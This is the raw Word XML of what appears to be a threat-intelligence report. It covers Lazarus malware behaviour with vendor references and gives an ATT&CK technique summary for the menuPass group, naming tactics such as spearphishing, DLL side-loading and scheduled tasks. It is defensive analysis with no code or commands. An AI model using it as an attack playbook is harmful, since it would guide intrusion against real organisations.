              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A4D995" w14:textId="3B436E94" w:rsidR="00F423B5" w:rsidRPr="004A37AE" w:rsidRDefault="00A452DC" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163C30E7" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:r>
              <w:t xml:space="preserve">After every action is performed the malware sends a response to the control server </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>indicating whether the action was successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="002D1D50" w14:paraId="498C7536" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36C78892" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FCF16BE" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66A8385C" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E870A3F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DA0F125" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2250059D" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F42489" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B2A8712" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C7970E2" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="0077286F" w:rsidRDefault="00F423B5" w:rsidP="00F423B5"/>
    <w:p w14:paraId="49EC66E4" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="00C94979" w:rsidRDefault="00F423B5" w:rsidP="00F423B5"/>
    <w:p w14:paraId="0D341C09" w14:textId="2444F33E" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">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043450C4" w14:textId="42ED6FFD" w:rsidR="004C6CB5" w:rsidRDefault="004C6CB5" w:rsidP="00F423B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>See notes above</w:t>
      </w:r>
      <w:r w:rsidR="00011587">
        <w:t xml:space="preserve"> (for 1 to 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC51D16" w14:textId="4767B8A1" w:rsidR="004C6CB5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId137" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant | McAfee Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2018]</w:t>
      </w:r>
      <w:r w:rsidR="004C6CB5">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42762878" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId138" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Lazarus targets </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>defense</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> industry with </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ThreatNeedle</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Securelist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB5A49" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Operation (</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>노스</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          </w:rPr>
          <w:t>스타</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>) North Star A Job Offer That’s Too Good to be True? | McAfee Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3826D" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign (malwarebytes.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F7C9E" w14:textId="51D3F2CB" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId141" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>LolZarus</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: Lazarus Group Incorporating </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Lolbins</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> into Campaigns | Qualys Security Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C9EBC" w14:textId="77777777" w:rsidR="00011587" w:rsidRDefault="00011587" w:rsidP="00F423B5"/>
    <w:p w14:paraId="4B163042" w14:textId="6490ECE1" w:rsidR="00011587" w:rsidRDefault="00011587" w:rsidP="00F423B5">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Lazarus targets </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>defense</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> industry with </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ThreatNeedle</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Securelist</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2021] – For T1049 but save for a new attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB55B04" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="00F423B5"/>
    <w:p w14:paraId="4782317C" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9"/>
    <w:p w14:paraId="04BFCB3F" w14:textId="77777777" w:rsidR="00742FA7" w:rsidRDefault="00742FA7" w:rsidP="00742FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3E8D3" w14:textId="0679D82B" w:rsidR="006152F1" w:rsidRDefault="006152F1" w:rsidP="006152F1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc153480886"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>menuPass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6537C6B5" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="005B4630" w:rsidRDefault="006152F1" w:rsidP="006152F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc153480887"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="685C96F2" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006152F1" w:rsidRDefault="006152F1" w:rsidP="00B67C9C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0045 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>menuPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4317C0FE" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006152F1" w:rsidRDefault="006152F1" w:rsidP="00B67C9C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0153AC84" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="006152F1" w:rsidRDefault="006152F1" w:rsidP="00B67C9C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is CN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DE813"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8CC325"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002', 'T1583.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35274828"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07EC5D"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0390B7"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1190', 'T1566.001', 'T1199', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D389A8"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1190 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354CF52" w14:textId="48E9E59F"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T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:r w:rsidR="001226E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A235BD"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1199 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted Relationship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F448EE"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9ED848"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1106', 'T1204.002', 'T1059.003', 'T1053.005', 'T1047', 'T1059.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADC2BE2"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1106 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Native API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C3BE5"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T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE27BE9" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="00E610D9" w:rsidRDefault="006152F1" w:rsidP="00556E97">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E610D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E610D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B86A92"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD1D1D"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB28C3F"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB14E5"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1574.002', 'T1574.001', 'T1053.005', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1D7505" w14:textId="77777777" w:rsidR="006152F1" w:rsidRPr="008B7D5D"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8B7D5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B7D5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571F4D3B"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T1574.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2B98E"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006152F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F576B9"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1078 :</w:t>
      </w:r>
